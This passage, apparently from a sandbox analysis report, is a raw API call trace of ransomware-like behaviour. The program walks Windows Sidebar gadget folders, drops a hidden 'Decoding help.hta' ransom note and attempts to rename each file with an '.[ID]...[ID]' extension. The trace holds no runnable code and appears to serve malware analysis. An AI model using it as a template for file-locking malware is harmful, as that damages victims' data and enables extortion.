Sidebar\\Gadgets\\MediaCenter.Gadget\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js\\*.*" [0059.073] GlobalMemoryStatus (in: lpBuffer=0x1d5dfd10 | out: lpBuffer=0x1d5dfd10) [0059.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10838320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd74 [0059.074] CloseHandle (hObject=0xd74) returned 1 [0059.074] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8fefd96, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc8fefd96, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x294e, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="")) returned 1 [0059.074] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" [0059.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\decoding help.hta")) returned 0x1 [0059.074] lstrcmpiW (lpString1="Decoding help.hta", lpString2="main.html") returned -1 [0059.074] lstrlenW (lpString="main.html") returned 9 [0059.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="main.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html" [0059.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html" [0059.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html.[ID]g9uZrLhJaygpwRm1[ID]" [0059.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\main.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\main.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\main.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.075] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9a59d04, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x9e9e7900, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0xe17d845, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MCESidebarCtrl.dll", cAlternateFileName="")) returned 1 [0059.075] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.075] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" [0059.075] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\decoding help.hta")) returned 0x1 [0059.076] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MCESidebarCtrl.dll") returned -1 [0059.076] lstrlenW (lpString="MCESidebarCtrl.dll") returned 18 [0059.076] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.076] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="MCESidebarCtrl.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll" [0059.076] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll" [0059.076] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0059.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\mcesidebarctrl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\MCESidebarCtrl.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\mcesidebarctrl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.076] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5862, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0059.077] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.077] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" [0059.077] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\decoding help.hta")) returned 0x1 [0059.077] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.html") returned -1 [0059.077] lstrlenW (lpString="settings.html") returned 13 [0059.077] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.077] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="settings.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html" [0059.077] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html" [0059.077] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" [0059.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\settings.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\settings.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.078] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fbf39ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5862, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 0 [0059.078] FindClose (in: hFindFile=0x671cb0 | out: hFindFile=0x671cb0) returned 1 Thread: id = 448 os_tid = 0x88c [0044.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*", lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8ad0 [0049.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.247] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.247] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.247] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b69cdc, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x85b69cdc, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x38816739, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7a53, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0049.623] lstrcpyW (in: lpString1=0x108e05f8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0049.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0049.624] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" [0049.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta")) returned 0xffffffff [0049.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0052.144] WriteFile (in: hFile=0x268, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d71fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d71fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.975] CloseHandle (hObject=0x268) returned 1 [0055.310] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.075] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0058.075] lstrlenW (lpString="drag.png") returned 8 [0058.075] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0058.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0058.075] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" [0058.075] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" [0058.075] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.075] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22fbc446, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.076] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0058.076] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0058.076] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0058.076] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0058.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0058.076] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US" [0058.076] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0058.076] GlobalMemoryStatus (in: lpBuffer=0x1d71fd10 | out: lpBuffer=0x1d71fd10) [0058.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a84c90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0058.077] CloseHandle (hObject=0x384) returned 1 [0058.077] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x388629f5, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x388629f5, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x38888b53, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x255b, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0058.077] lstrcpyW (in: lpString1=0x108e05f8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0058.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0058.077] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" [0058.077] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta")) returned 0x1 [0058.077] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0058.077] lstrlenW (lpString="icon.png") returned 8 [0058.077] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0058.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0058.077] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" [0058.077] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" [0058.077] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.078] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x806605fc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x806605fc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Images", cAlternateFileName="")) returned 1 [0058.078] lstrcmpW (lpString1=".", lpString2="Images") returned -1 [0058.078] lstrcmpW (lpString1="..", lpString2="Images") returned -1 [0058.078] lstrcmpiW (lpString1="windows", lpString2="Images") returned 1 [0058.078] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: 